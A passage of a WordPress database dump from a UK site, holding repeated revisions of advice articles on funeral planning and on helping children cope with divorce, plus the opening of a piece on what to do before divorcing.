href=\"https://www.telegraph.co.uk/financial-services/retirement-solutions/funeral-plans/comparing-funeral-plans/\" target=\"_blank\" rel=\"noopener\">How to compare funeral plans</a>','The importance of funeral planning','','inherit','closed','closed','','346-revision-v1','','','2018-05-10 14:14:17','2018-05-10 14:14:17','',346,'http://www.bournesociety.org.uk/346-revision-v1',0,'revision','',0),(350,1,'2018-05-10 14:16:00','2018-05-10 14:16:00','<h2>Difference between a Funeral and Memorial Services</h2>\r\nMaking funeral arrangements for a perished loved ones, or pre-planning your own funeral or memorial service can be a confusing and overwhelming task. When making funeral arrangements, one of the first questions you should ask yourself is what type of service is preferred. It is important that you tell your guests whether you are holding a funeral or a memorial service.\r\n\r\nPlease <a href=\"http://www.bournesociety.org.uk/contact\">contact Bourne Advice</a> for information regarding funeral planning.\r\n<h2><a href=\"https://www.write-out-loud.com/eulogy-write.html\" target=\"_blank\" rel=\"noopener\">The Eulogy. The most important part of a funeral</a></h2>\r\nEulogy is a speech at a funeral service to recollect the life and achievements of the perished. The best eulogies come from the heart and are written and delivered by someone close to the perished, so it does not need perfect sentence structure or grammar to be a good eulogy.\r\n<h2>Make Funeral Arrangements Early to avoid Problems</h2>\r\n<em>Pre-arranged funeral plans have become popular.</em> This will let you to pre-arrange your funeral so that the burden of making lots of decisions will not rest upon your relatives when you are gone. It is also a way for you to be able to control or select among the options that would otherwise be available to your family and friends.\r\n\r\nPlanning your funeral in advance takes the heavy burden off of your loved ones, making the grieving period that slight bit easier.\r\n\r\nThere are many funeral directors in your local area that can help towards creating the ideal plan for you. <a href=\"https://www.funeralguide.co.uk/\" target=\"_blank\" rel=\"noopener\">Click here</a> for more information on creating your funeral plan.\r\n\r\n<strong>There are a host of benefits that comes with planning your own funeral, including:</strong>\r\n<ul>\r\n 	<li>Peace of mind: the burden on your family has lessened during such a difficult time</li>\r\n 	<li>Plan for you: you can plan how you want your loved ones to remember you with music &amp; themes</li>\r\n 	<li>Keep costs low: you can avoid the rising costs of funeral due to inflation. Pay for your funeral at today\'s prices</li>\r\n 	<li>Payment plan: choose how you want to pay - monthly instalments or pay outright</li>\r\n</ul>\r\nRead More: <a href=\"https://www.telegraph.co.uk/financial-services/retirement-solutions/funeral-plans/comparing-funeral-plans/\" target=\"_blank\" rel=\"noopener\">How to compare funeral plans</a>','The importance of funeral planning','','inherit','closed','closed','','346-revision-v1','','','2018-05-10 14:16:00','2018-05-10 14:16:00','',346,'http://www.bournesociety.org.uk/346-revision-v1',0,'revision','',0),(352,1,'2018-07-27 12:05:49','2018-07-27 12:05:49','Children go through a range of emotions once they learn their parents are getting a <em>divorce</em>. This can end up with children blaming themselves in some way for the divorce. They’ll remember each of the times their parents had a disagreement over them and feel it is their own fault.\n\nNone of these conditions are suitable for children and there’s little doubt suffering through all this will leave indelible psychological scars from this extremely unhappy period of their life.\n<h2>Should you stay together for the children\'s sake?</h2>\nThe fact is, many couples decide not to get a <strong>divorce</strong> no matter what simply for the benefit of their children. They want to break free and to start a new life but they don’t. Years later, they may regret doing this and realise that staying in the marriage for their children’s sake was a big mistake for all concerned. They certainly weren’t happy and chances are everyone in the household was suffering because of what was going on emotionally.\n<h2>Divorce and children – the effects</h2>\nWhat is happening to so many children living with parents in an unhappy marriage right now has to be addressed.\n\nThese children are seriously affected by all the abuse they see, whether it be verbal, emotional or the worst of all, physical abuse. In many cases, the children will see controlling behaviours such as affection or money being withheld for one spouse to exert control over the other.\n\nA parent may apply for a DVO if they feel threatened or have been experiencing violence from their other half. The court will decide rules that should be followed for the person that has committed the offence. If you need help to successfully gain a DVO for acts of violence, <a href=\"https://www.emersoncriminallaw.com.au/domestic-violence-law/\">visit this website for more advice</a>.\n\nIt is the emotional state of children that very often keeps people in a marriage when they want out though. They have heard all the horror stories about children with trust issues and relationship issues because of their parents being divorced and experiences they have witnessed firsthand.\n\nChildren pick up on a lot of behaviours. It is inevitable they will sense all the tension that is there between you and your spouse. They are going to be right there in the middle of things if there is still a lot of unresolved conflict going on. <em>It can be very unhealthy for them to see such issues taking place.</em>\n\nThe things that generally cause the biggest problems are seeing all the negative things that happen before the actual divorce. Seeing your parents call each other nasty names or throwing stuff around and fighting aren’t the sort of things that a child is likely to forget. Obviously there are bound to be many difficult issues when going through a divorce but the main thing is do everything you can stop your children from seeing them.\n\n<a href=\"http://www.family-lawfirm.co.uk/Articles/Divorce-and-Separation/How-to-Avoid-a-Messy-Divorce.aspx\">Messy divorces</a> where each spouse is blaming the other and getting the children in the middle of it aren’t going to benefit anyone at all. Whenever you say nasty things about your ex in front of your children you simply cause them more hurt. When all is said and done, that person is still their parent and still someone they probably love and respect.\n<h2>Talk about the divorce to your children</h2>\nBe certain that you take the time to speak to your children about what they feel about the divorce. It is very important for parents to encourage their children to talk openly about how the divorce is affecting them. Too many children hide what they truly feel as they don’t want to make things more difficult for the parents. They know you are under <a href=\"http://my.clevelandclinic.org/healthy_living/stress_management/hic_warning_signs_of_emotional_stress_when_to_see_your_doctor.aspx\">emotional stress</a> and they don’t want to make things worse. <strong>Children can be a lot wiser and compassionate than you realise.</strong>\n\nIf you take the right approach you can <a href=\"http://www.helpguide.org/mental/children_divorce.htm\" target=\"_blank\" rel=\"noopener\">go through a divorce</a> and still have a decent <a href=\"http://life.familyeducation.com/parenting/discipline/36653.html\">relationship with your children</a> afterwards. Make sure that they know they can come to either parent whenever they have any problems. As long as you reassure them that everything is going to be fine and make them feel loved and safe you should get through your divorce without your children, or you, suffering from future problems.','Divorce and Children - Avoiding Divorce Problems','Children go through a range of emotions once they learn their parents are getting a divorce. Avoiding divorce problems affecting your children is paramount.','inherit','closed','closed','','60-autosave-v1','','','2018-07-27 12:05:49','2018-07-27 12:05:49','',60,'http://www.bournesociety.org.uk/60-autosave-v1',0,'revision','',0),(353,1,'2018-07-27 12:06:01','2018-07-27 12:06:01','Children go through a range of emotions once they learn their parents are getting a <em>divorce</em>. This can end up with children blaming themselves in some way for the divorce. They’ll remember each of the times their parents had a disagreement over them and feel it is their own fault.\r\n\r\nNone of these conditions are suitable for children and there’s little doubt suffering through all this will leave indelible psychological scars from this extremely unhappy period of their life.\r\n<h2>Should you stay together for the children\'s sake?</h2>\r\nThe fact is, many couples decide not to get a <strong>divorce</strong> no matter what simply for the benefit of their children. They want to break free and to start a new life but they don’t. Years later, they may regret doing this and realise that staying in the marriage for their children’s sake was a big mistake for all concerned. They certainly weren’t happy and chances are everyone in the household was suffering because of what was going on emotionally.\r\n<h2>Divorce and children – the effects</h2>\r\nWhat is happening to so many children living with parents in an unhappy marriage right now has to be addressed.\r\n\r\nThese children are seriously affected by all the abuse they see, whether it be verbal, emotional or the worst of all, physical abuse. In many cases, the children will see controlling behaviours such as affection or money being withheld for one spouse to exert control over the other.\r\n\r\nA parent may apply for a DVO if they feel threatened or have been experiencing violence from their other half. The court will decide rules that should be followed for the person that has committed the offence. If you need help to successfully gain a DVO for acts of violence, <a href=\"https://www.emersoncriminallaw.com.au/domestic-violence-law/\" target=\"_blank\" rel=\"noopener\">visit this website for more advice</a>.\r\n\r\nIt is the emotional state of children that very often keeps people in a marriage when they want out though. They have heard all the horror stories about children with trust issues and relationship issues because of their parents being divorced and experiences they have witnessed firsthand.\r\n\r\nChildren pick up on a lot of behaviours. It is inevitable they will sense all the tension that is there between you and your spouse. They are going to be right there in the middle of things if there is still a lot of unresolved conflict going on. <em>It can be very unhealthy for them to see such issues taking place.</em>\r\n\r\nThe things that generally cause the biggest problems are seeing all the negative things that happen before the actual divorce. Seeing your parents call each other nasty names or throwing stuff around and fighting aren’t the sort of things that a child is likely to forget. Obviously there are bound to be many difficult issues when going through a divorce but the main thing is do everything you can stop your children from seeing them.\r\n\r\n<a href=\"http://www.family-lawfirm.co.uk/Articles/Divorce-and-Separation/How-to-Avoid-a-Messy-Divorce.aspx\">Messy divorces</a> where each spouse is blaming the other and getting the children in the middle of it aren’t going to benefit anyone at all. Whenever you say nasty things about your ex in front of your children you simply cause them more hurt. When all is said and done, that person is still their parent and still someone they probably love and respect.\r\n<h2>Talk about the divorce to your children</h2>\r\nBe certain that you take the time to speak to your children about what they feel about the divorce. It is very important for parents to encourage their children to talk openly about how the divorce is affecting them. Too many children hide what they truly feel as they don’t want to make things more difficult for the parents. They know you are under <a href=\"http://my.clevelandclinic.org/healthy_living/stress_management/hic_warning_signs_of_emotional_stress_when_to_see_your_doctor.aspx\">emotional stress</a> and they don’t want to make things worse. <strong>Children can be a lot wiser and compassionate than you realise.</strong>\r\n\r\nIf you take the right approach you can <a href=\"http://www.helpguide.org/mental/children_divorce.htm\" target=\"_blank\" rel=\"noopener\">go through a divorce</a> and still have a decent <a href=\"http://life.familyeducation.com/parenting/discipline/36653.html\">relationship with your children</a> afterwards. Make sure that they know they can come to either parent whenever they have any problems. As long as you reassure them that everything is going to be fine and make them feel loved and safe you should get through your divorce without your children, or you, suffering from future problems.','Divorce and Children - Avoiding Divorce Problems','Children go through a range of emotions once they learn their parents are getting a divorce. Avoiding divorce problems affecting your children is paramount.','inherit','closed','closed','','60-revision-v1','','','2018-07-27 12:06:01','2018-07-27 12:06:01','',60,'http://www.bournesociety.org.uk/60-revision-v1',0,'revision','',0),(354,1,'2018-07-27 12:07:51','2018-07-27 12:07:51','','Summer Happy Sunset Beach Happiness Family','','inherit','closed','closed','','summer-happy-sunset-beach-happiness-family','','','2018-07-27 12:08:04','2018-07-27 12:08:04','',60,'http://www.bournesociety.org.uk/wp-content/uploads/2017/10/family.jpg',0,'attachment','image/jpeg',0),(355,1,'2018-07-27 12:08:42','2018-07-27 12:08:42','<h2>Helping children cope with divorce</h2>\r\nChildren go through a range of emotions once they learn their parents are getting a <em>divorce</em>. This can end up with children blaming themselves in some way for the divorce. They’ll remember each of the times their parents had a disagreement over them and feel it is their own fault.\r\n\r\nNone of these conditions are suitable for children and there’s little doubt suffering through all this will leave indelible psychological scars from this extremely unhappy period of their life.\r\n<h2>Should you stay together for the children\'s sake?</h2>\r\nThe fact is, many couples decide not to get a <strong>divorce</strong> no matter what simply for the benefit of their children. They want to break free and to start a new life but they don’t. Years later, they may regret doing this and realise that staying in the marriage for their children’s sake was a big mistake for all concerned. They certainly weren’t happy and chances are everyone in the household was suffering because of what was going on emotionally.\r\n<h2>Divorce and children – the effects</h2>\r\nWhat is happening to so many children living with parents in an unhappy marriage right now has to be addressed.\r\n\r\nThese children are seriously affected by all the abuse they see, whether it be verbal, emotional or the worst of all, physical abuse. In many cases, the children will see controlling behaviours such as affection or money being withheld for one spouse to exert control over the other.\r\n\r\nA parent may apply for a DVO if they feel threatened or have been experiencing violence from their other half. The court will decide rules that should be followed for the person that has committed the offence. If you need help to successfully gain a DVO for acts of violence, <a href=\"https://www.emersoncriminallaw.com.au/domestic-violence-law/\" target=\"_blank\" rel=\"noopener\">visit this website for more advice</a>.\r\n\r\nIt is the emotional state of children that very often keeps people in a marriage when they want out though. They have heard all the horror stories about children with trust issues and relationship issues because of their parents being divorced and experiences they have witnessed firsthand.\r\n\r\nChildren pick up on a lot of behaviours. It is inevitable they will sense all the tension that is there between you and your spouse. They are going to be right there in the middle of things if there is still a lot of unresolved conflict going on. <em>It can be very unhealthy for them to see such issues taking place.</em>\r\n\r\nThe things that generally cause the biggest problems are seeing all the negative things that happen before the actual divorce. Seeing your parents call each other nasty names or throwing stuff around and fighting aren’t the sort of things that a child is likely to forget. Obviously there are bound to be many difficult issues when going through a divorce but the main thing is do everything you can stop your children from seeing them.\r\n\r\n<a href=\"http://www.family-lawfirm.co.uk/Articles/Divorce-and-Separation/How-to-Avoid-a-Messy-Divorce.aspx\">Messy divorces</a> where each spouse is blaming the other and getting the children in the middle of it aren’t going to benefit anyone at all. Whenever you say nasty things about your ex in front of your children you simply cause them more hurt. When all is said and done, that person is still their parent and still someone they probably love and respect.\r\n<h2>Talk about the divorce to your children</h2>\r\nBe certain that you take the time to speak to your children about what they feel about the divorce. It is very important for parents to encourage their children to talk openly about how the divorce is affecting them. Too many children hide what they truly feel as they don’t want to make things more difficult for the parents. They know you are under <a href=\"http://my.clevelandclinic.org/healthy_living/stress_management/hic_warning_signs_of_emotional_stress_when_to_see_your_doctor.aspx\">emotional stress</a> and they don’t want to make things worse. <strong>Children can be a lot wiser and compassionate than you realise.</strong>\r\n\r\nIf you take the right approach you can <a href=\"http://www.helpguide.org/mental/children_divorce.htm\" target=\"_blank\" rel=\"noopener\">go through a divorce</a> and still have a decent <a href=\"http://life.familyeducation.com/parenting/discipline/36653.html\">relationship with your children</a> afterwards. Make sure that they know they can come to either parent whenever they have any problems. As long as you reassure them that everything is going to be fine and make them feel loved and safe you should get through your divorce without your children, or you, suffering from future problems.','Divorce and Children - Avoiding Divorce Problems','Children go through a range of emotions once they learn their parents are getting a divorce. Avoiding divorce problems affecting your children is paramount.','inherit','closed','closed','','60-revision-v1','','','2018-07-27 12:08:42','2018-07-27 12:08:42','',60,'http://www.bournesociety.org.uk/60-revision-v1',0,'revision','',0),(356,1,'2018-07-27 12:10:29','2018-07-27 12:10:29','','children','','inherit','closed','closed','','children','','','2018-07-27 12:10:41','2018-07-27 12:10:41','',60,'http://www.bournesociety.org.uk/wp-content/uploads/2017/10/children.jpg',0,'attachment','image/jpeg',0),(357,1,'2018-07-27 12:10:48','2018-07-27 12:10:48','<h2>Helping children cope with divorce</h2>\r\nChildren go through a range of emotions once they learn their parents are getting a <em>divorce</em>. This can end up with children blaming themselves in some way for the divorce. They’ll remember each of the times their parents had a disagreement over them and feel it is their own fault.\r\n\r\nNone of these conditions are suitable for children and there’s little doubt suffering through all this will leave indelible psychological scars from this extremely unhappy period of their life.\r\n<h2>Should you stay together for the children\'s sake?</h2>\r\nThe fact is, many couples decide not to get a <strong>divorce</strong> no matter what simply for the benefit of their children. They want to break free and to start a new life but they don’t. Years later, they may regret doing this and realise that staying in the marriage for their children’s sake was a big mistake for all concerned. They certainly weren’t happy and chances are everyone in the household was suffering because of what was going on emotionally.\r\n<h2>Divorce and children – the effects</h2>\r\nWhat is happening to so many children living with parents in an unhappy marriage right now has to be addressed.\r\n\r\nThese children are seriously affected by all the abuse they see, whether it be verbal, emotional or the worst of all, physical abuse. In many cases, the children will see controlling behaviours such as affection or money being withheld for one spouse to exert control over the other.\r\n\r\nA parent may apply for a DVO if they feel threatened or have been experiencing violence from their other half. The court will decide rules that should be followed for the person that has committed the offence. If you need help to successfully gain a DVO for acts of violence, <a href=\"https://www.emersoncriminallaw.com.au/domestic-violence-law/\" target=\"_blank\" rel=\"noopener\">visit this website for more advice</a>.\r\n\r\n<a href=\"/\"><img class=\"alignnone size-full wp-image-356\" src=\"http://www.bournesociety.org.uk/wp-content/uploads/2017/10/children.jpg\" alt=\"Happy children during a divorce\" width=\"960\" height=\"640\" /></a>\r\n<h2>Children pick up on abusive behaviour</h2>\r\nIt is the emotional state of children that very often keeps people in a marriage when they want out though. They have heard all the horror stories about children with trust issues and relationship issues because of their parents being divorced and experiences they have witnessed firsthand.\r\n\r\nChildren pick up on a lot of behaviours. It is inevitable they will sense all the tension that is there between you and your spouse. They are going to be right there in the middle of things if there is still a lot of unresolved conflict going on. <em>It can be very unhealthy for them to see such issues taking place.</em>\r\n\r\nThe things that generally cause the biggest problems are seeing all the negative things that happen before the actual divorce. Seeing your parents call each other nasty names or throwing stuff around and fighting aren’t the sort of things that a child is likely to forget. Obviously there are bound to be many difficult issues when going through a divorce but the main thing is do everything you can stop your children from seeing them.\r\n\r\n<a href=\"http://www.family-lawfirm.co.uk/Articles/Divorce-and-Separation/How-to-Avoid-a-Messy-Divorce.aspx\">Messy divorces</a> where each spouse is blaming the other and getting the children in the middle of it aren’t going to benefit anyone at all. Whenever you say nasty things about your ex in front of your children you simply cause them more hurt. When all is said and done, that person is still their parent and still someone they probably love and respect.\r\n<h2>Talk about the divorce to your children</h2>\r\nBe certain that you take the time to speak to your children about what they feel about the divorce. It is very important for parents to encourage their children to talk openly about how the divorce is affecting them. Too many children hide what they truly feel as they don’t want to make things more difficult for the parents. They know you are under <a href=\"http://my.clevelandclinic.org/healthy_living/stress_management/hic_warning_signs_of_emotional_stress_when_to_see_your_doctor.aspx\">emotional stress</a> and they don’t want to make things worse. <strong>Children can be a lot wiser and compassionate than you realise.</strong>\r\n\r\nIf you take the right approach you can <a href=\"http://www.helpguide.org/mental/children_divorce.htm\" target=\"_blank\" rel=\"noopener\">go through a divorce</a> and still have a decent <a href=\"http://life.familyeducation.com/parenting/discipline/36653.html\">relationship with your children</a> afterwards. Make sure that they know they can come to either parent whenever they have any problems. As long as you reassure them that everything is going to be fine and make them feel loved and safe you should get through your divorce without your children, or you, suffering from future problems.','Divorce and Children - Avoiding Divorce Problems','Children go through a range of emotions once they learn their parents are getting a divorce. Avoiding divorce problems affecting your children is paramount.','inherit','closed','closed','','60-revision-v1','','','2018-07-27 12:10:48','2018-07-27 12:10:48','',60,'http://www.bournesociety.org.uk/60-revision-v1',0,'revision','',0),(358,1,'2018-07-27 12:11:06','2018-07-27 12:11:06','<h2>Helping children cope with divorce</h2>\r\nChildren go through a range of emotions once they learn their parents are getting a <em>divorce</em>. This can end up with children blaming themselves in some way for the divorce. They’ll remember each of the times their parents had a disagreement over them and feel it is their own fault.\r\n\r\nNone of these conditions are suitable for children and there’s little doubt suffering through all this will leave indelible psychological scars from this extremely unhappy period of their life.\r\n<h2>Should you stay together for the children\'s sake?</h2>\r\nThe fact is, many couples decide not to get a <strong>divorce</strong> no matter what simply for the benefit of their children. They want to break free and to start a new life but they don’t. Years later, they may regret doing this and realise that staying in the marriage for their children’s sake was a big mistake for all concerned. They certainly weren’t happy and chances are everyone in the household was suffering because of what was going on emotionally.\r\n<h2>Divorce and children – the effects</h2>\r\nWhat is happening to so many children living with parents in an unhappy marriage right now has to be addressed.\r\n\r\nThese children are seriously affected by all the abuse they see, whether it be verbal, emotional or the worst of all, physical abuse. In many cases, the children will see controlling behaviours such as affection or money being withheld for one spouse to exert control over the other.\r\n\r\nA parent may apply for a DVO if they feel threatened or have been experiencing violence from their other half. The court will decide rules that should be followed for the person that has committed the offence. If you need help to successfully gain a DVO for acts of violence, <a href=\"https://www.emersoncriminallaw.com.au/domestic-violence-law/\" target=\"_blank\" rel=\"noopener\">visit this website for more advice</a>.<a href=\"/\"><img class=\"alignnone size-full wp-image-356\" src=\"http://www.bournesociety.org.uk/wp-content/uploads/2017/10/children.jpg\" alt=\"Happy children during a divorce\" width=\"960\" height=\"640\" /></a>\r\n<h2>Children pick up on abusive behaviour</h2>\r\nIt is the emotional state of children that very often keeps people in a marriage when they want out though. They have heard all the horror stories about children with trust issues and relationship issues because of their parents being divorced and experiences they have witnessed firsthand.\r\n\r\nChildren pick up on a lot of behaviours. It is inevitable they will sense all the tension that is there between you and your spouse. They are going to be right there in the middle of things if there is still a lot of unresolved conflict going on. <em>It can be very unhealthy for them to see such issues taking place.</em>\r\n\r\nThe things that generally cause the biggest problems are seeing all the negative things that happen before the actual divorce. Seeing your parents call each other nasty names or throwing stuff around and fighting aren’t the sort of things that a child is likely to forget. Obviously there are bound to be many difficult issues when going through a divorce but the main thing is do everything you can stop your children from seeing them.\r\n\r\n<a href=\"http://www.family-lawfirm.co.uk/Articles/Divorce-and-Separation/How-to-Avoid-a-Messy-Divorce.aspx\">Messy divorces</a> where each spouse is blaming the other and getting the children in the middle of it aren’t going to benefit anyone at all. Whenever you say nasty things about your ex in front of your children you simply cause them more hurt. When all is said and done, that person is still their parent and still someone they probably love and respect.\r\n<h2>Talk about the divorce to your children</h2>\r\nBe certain that you take the time to speak to your children about what they feel about the divorce. It is very important for parents to encourage their children to talk openly about how the divorce is affecting them. Too many children hide what they truly feel as they don’t want to make things more difficult for the parents. They know you are under <a href=\"http://my.clevelandclinic.org/healthy_living/stress_management/hic_warning_signs_of_emotional_stress_when_to_see_your_doctor.aspx\">emotional stress</a> and they don’t want to make things worse. <strong>Children can be a lot wiser and compassionate than you realise.</strong>\r\n\r\nIf you take the right approach you can <a href=\"http://www.helpguide.org/mental/children_divorce.htm\" target=\"_blank\" rel=\"noopener\">go through a divorce</a> and still have a decent <a href=\"http://life.familyeducation.com/parenting/discipline/36653.html\">relationship with your children</a> afterwards. Make sure that they know they can come to either parent whenever they have any problems. As long as you reassure them that everything is going to be fine and make them feel loved and safe you should get through your divorce without your children, or you, suffering from future problems.','Divorce and Children - Avoiding Divorce Problems','Children go through a range of emotions once they learn their parents are getting a divorce. Avoiding divorce problems affecting your children is paramount.','inherit','closed','closed','','60-revision-v1','','','2018-07-27 12:11:06','2018-07-27 12:11:06','',60,'http://www.bournesociety.org.uk/60-revision-v1',0,'revision','',0),(359,1,'2018-07-27 12:13:09','2018-07-27 12:13:09','<h2>Helping children cope with divorce</h2>\r\nChildren go through a range of emotions once they learn their parents are getting a <em>divorce</em>. This can end up with children blaming themselves in some way for the divorce. They’ll remember each of the times their parents had a disagreement over them and feel it is their own fault.\r\n\r\nNone of these conditions are suitable for children and there’s little doubt suffering through all this will leave indelible psychological scars from this extremely unhappy period of their life. P<a href=\"http://www.bournesociety.org.uk/contact\">lease get in touch with us for more information</a>.\r\n<h2>Should you stay together for the children\'s sake?</h2>\r\nThe fact is, many couples decide not to get a <strong>divorce</strong> no matter what simply for the benefit of their children. They want to break free and to start a new life but they don’t. Years later, they may regret doing this and realise that staying in the marriage for their children’s sake was a big mistake for all concerned. They certainly weren’t happy and chances are everyone in the household was suffering because of what was going on emotionally.\r\n<h2>Divorce and children – the effects</h2>\r\nWhat is happening to so many children living with parents in an unhappy marriage right now has to be addressed.\r\n\r\nThese children are seriously affected by all the abuse they see, whether it be verbal, emotional or the worst of all, physical abuse. In many cases, the children will see controlling behaviours such as affection or money being withheld for one spouse to exert control over the other.\r\n\r\nA parent may apply for a DVO if they feel threatened or have been experiencing violence from their other half. The court will decide rules that should be followed for the person that has committed the offence. If you need help to successfully gain a DVO for acts of violence, <a href=\"https://www.emersoncriminallaw.com.au/domestic-violence-law/\" target=\"_blank\" rel=\"noopener\">visit this website for more advice</a>.<a href=\"/\"><img class=\"alignnone size-full wp-image-356\" src=\"http://www.bournesociety.org.uk/wp-content/uploads/2017/10/children.jpg\" alt=\"Happy children during a divorce\" width=\"960\" height=\"640\" /></a>\r\n<h2>Children pick up on abusive behaviour</h2>\r\nIt is the emotional state of children that very often keeps people in a marriage when they want out though. They have heard all the horror stories about children with trust issues and relationship issues because of their parents being divorced and experiences they have witnessed firsthand.\r\n\r\nChildren pick up on a lot of behaviours. It is inevitable they will sense all the tension that is there between you and your spouse. They are going to be right there in the middle of things if there is still a lot of unresolved conflict going on. <em>It can be very unhealthy for them to see such issues taking place.</em>\r\n\r\nThe things that generally cause the biggest problems are seeing all the negative things that happen before the actual divorce. Seeing your parents call each other nasty names or throwing stuff around and fighting aren’t the sort of things that a child is likely to forget. Obviously there are bound to be many difficult issues when going through a divorce but the main thing is do everything you can stop your children from seeing them.\r\n\r\n<a href=\"http://www.family-lawfirm.co.uk/Articles/Divorce-and-Separation/How-to-Avoid-a-Messy-Divorce.aspx\">Messy divorces</a> where each spouse is blaming the other and getting the children in the middle of it aren’t going to benefit anyone at all. Whenever you say nasty things about your ex in front of your children you simply cause them more hurt. When all is said and done, that person is still their parent and still someone they probably love and respect.\r\n<h2>Talk about the divorce to your children</h2>\r\nBe certain that you take the time to speak to your children about what they feel about the divorce. It is very important for parents to encourage their children to talk openly about how the divorce is affecting them. Too many children hide what they truly feel as they don’t want to make things more difficult for the parents. They know you are under <a href=\"http://my.clevelandclinic.org/healthy_living/stress_management/hic_warning_signs_of_emotional_stress_when_to_see_your_doctor.aspx\">emotional stress</a> and they don’t want to make things worse. <strong>Children can be a lot wiser and compassionate than you realise.</strong>\r\n\r\nIf you take the right approach you can <a href=\"http://www.helpguide.org/mental/children_divorce.htm\" target=\"_blank\" rel=\"noopener\">go through a divorce</a> and still have a decent <a href=\"http://life.familyeducation.com/parenting/discipline/36653.html\">relationship with your children</a> afterwards. Make sure that they know they can come to either parent whenever they have any problems. As long as you reassure them that everything is going to be fine and make them feel loved and safe you should get through your divorce without your children, or you, suffering from future problems.','Divorce and Children - Avoiding Divorce Problems','Children go through a range of emotions once they learn their parents are getting a divorce. Avoiding divorce problems affecting your children is paramount.','inherit','closed','closed','','60-revision-v1','','','2018-07-27 12:13:09','2018-07-27 12:13:09','',60,'http://www.bournesociety.org.uk/60-revision-v1',0,'revision','',0),(360,1,'2018-07-27 12:13:29','2018-07-27 12:13:29','<h2>Helping children cope with divorce</h2>\r\nChildren go through a range of emotions once they learn their parents are getting a <em>divorce</em>. This can end up with children blaming themselves in some way for the divorce. They’ll remember each of the times their parents had a disagreement over them and feel it is their own fault.\r\n\r\nNone of these conditions are suitable for children and there’s little doubt suffering through all this will leave indelible psychological scars from this extremely unhappy period of their life. <a href=\"http://www.bournesociety.org.uk/contact\">Please get in touch with us for more information</a>.\r\n<h2>Should you stay together for the children\'s sake?</h2>\r\nThe fact is, many couples decide not to get a <strong>divorce</strong> no matter what simply for the benefit of their children. They want to break free and to start a new life but they don’t. Years later, they may regret doing this and realise that staying in the marriage for their children’s sake was a big mistake for all concerned. They certainly weren’t happy and chances are everyone in the household was suffering because of what was going on emotionally.\r\n<h2>Divorce and children – the effects</h2>\r\nWhat is happening to so many children living with parents in an unhappy marriage right now has to be addressed.\r\n\r\nThese children are seriously affected by all the abuse they see, whether it be verbal, emotional or the worst of all, physical abuse. In many cases, the children will see controlling behaviours such as affection or money being withheld for one spouse to exert control over the other.\r\n\r\nA parent may apply for a DVO if they feel threatened or have been experiencing violence from their other half. The court will decide rules that should be followed for the person that has committed the offence. If you need help to successfully gain a DVO for acts of violence, <a href=\"https://www.emersoncriminallaw.com.au/domestic-violence-law/\" target=\"_blank\" rel=\"noopener\">visit this website for more advice</a>.<a href=\"/\"><img class=\"alignnone size-full wp-image-356\" src=\"http://www.bournesociety.org.uk/wp-content/uploads/2017/10/children.jpg\" alt=\"Happy children during a divorce\" width=\"960\" height=\"640\" /></a>\r\n<h2>Children pick up on abusive behaviour</h2>\r\nIt is the emotional state of children that very often keeps people in a marriage when they want out though. They have heard all the horror stories about children with trust issues and relationship issues because of their parents being divorced and experiences they have witnessed firsthand.\r\n\r\nChildren pick up on a lot of behaviours. It is inevitable they will sense all the tension that is there between you and your spouse. They are going to be right there in the middle of things if there is still a lot of unresolved conflict going on. <em>It can be very unhealthy for them to see such issues taking place.</em>\r\n\r\nThe things that generally cause the biggest problems are seeing all the negative things that happen before the actual divorce. Seeing your parents call each other nasty names or throwing stuff around and fighting aren’t the sort of things that a child is likely to forget. Obviously there are bound to be many difficult issues when going through a divorce but the main thing is do everything you can stop your children from seeing them.\r\n\r\n<a href=\"http://www.family-lawfirm.co.uk/Articles/Divorce-and-Separation/How-to-Avoid-a-Messy-Divorce.aspx\">Messy divorces</a> where each spouse is blaming the other and getting the children in the middle of it aren’t going to benefit anyone at all. Whenever you say nasty things about your ex in front of your children you simply cause them more hurt. When all is said and done, that person is still their parent and still someone they probably love and respect.\r\n<h2>Talk about the divorce to your children</h2>\r\nBe certain that you take the time to speak to your children about what they feel about the divorce. It is very important for parents to encourage their children to talk openly about how the divorce is affecting them. Too many children hide what they truly feel as they don’t want to make things more difficult for the parents. They know you are under <a href=\"http://my.clevelandclinic.org/healthy_living/stress_management/hic_warning_signs_of_emotional_stress_when_to_see_your_doctor.aspx\">emotional stress</a> and they don’t want to make things worse. <strong>Children can be a lot wiser and compassionate than you realise.</strong>\r\n\r\nIf you take the right approach you can <a href=\"http://www.helpguide.org/mental/children_divorce.htm\" target=\"_blank\" rel=\"noopener\">go through a divorce</a> and still have a decent <a href=\"http://life.familyeducation.com/parenting/discipline/36653.html\">relationship with your children</a> afterwards. Make sure that they know they can come to either parent whenever they have any problems. As long as you reassure them that everything is going to be fine and make them feel loved and safe you should get through your divorce without your children, or you, suffering from future problems.','Divorce and Children - Avoiding Divorce Problems','Children go through a range of emotions once they learn their parents are getting a divorce. Avoiding divorce problems affecting your children is paramount.','inherit','closed','closed','','60-revision-v1','','','2018-07-27 12:13:29','2018-07-27 12:13:29','',60,'http://www.bournesociety.org.uk/60-revision-v1',0,'revision','',0),(362,1,'2018-11-08 15:10:04','2018-11-08 15:10:04','<div id=\"content\" class=\"hfeed\">\r\n<div class=\"post-43 post type-post status-publish format-standard hentry category-divorce tag-marriage-counselor\">\r\n<h1 class=\"entry-title\">5 Things To Do Before You Even Think About Getting A Divorce</h1>\r\n<div class=\"byline-meta\"></div>\r\n<div class=\"entry-content\">\r\n\r\nSeeking a divorce is the last resort in a broken marriage. No matter the circumstances or reasoning, divorces can be extremely tough for all parties involved.\r\n\r\nIf you’re looking for guidance on what to do before seeking a divorce, continue reading below. If you’re based in the Brisbane area and are currently seeking legal advice, <a href=\"https://emfl.com.au/services/\" target=\"_blank\" rel=\"noopener\">find out more here.</a>\r\n<span id=\"more-43\"></span>\r\n<h3>1. Talk to a Marriage Counselor or other professional who may be able to help you .</h3>\r\nEven if you don’t think there’s hope for the marriage, divorce counseling can help you discover what went wrong, how to cope, and how to pick up the pieces and go on. Don’t wait for your spouse to participate. If you don’t know how to find a qualified counselor, our firm will be glad to recommend one or you can check out the directory of professionals at stayhappilymarried.com. Your employment, social or religious contacts might also provide leads.\r\n<h3>2. Talk to an attorney before you do anything.</h3>\r\nEven if you don’t end up hiring an attorney to handle your separation or divorce, you would be well advised to get as much information as you can before you even discuss divorce with your spouse. There’s a lot to know about divorce in North Carolina our laws are complex and even the simplest situation can be very confusing to families already in distress. Actions you take now may very well affect the outcome of your divorce (see #3) and you need to understand your options ahead of timenot some time down the road when it may be too late to alter the outcome. Click here to find attorneys who are well versed in the intricacies of North Carolina divorce law.\r\n<h3><a 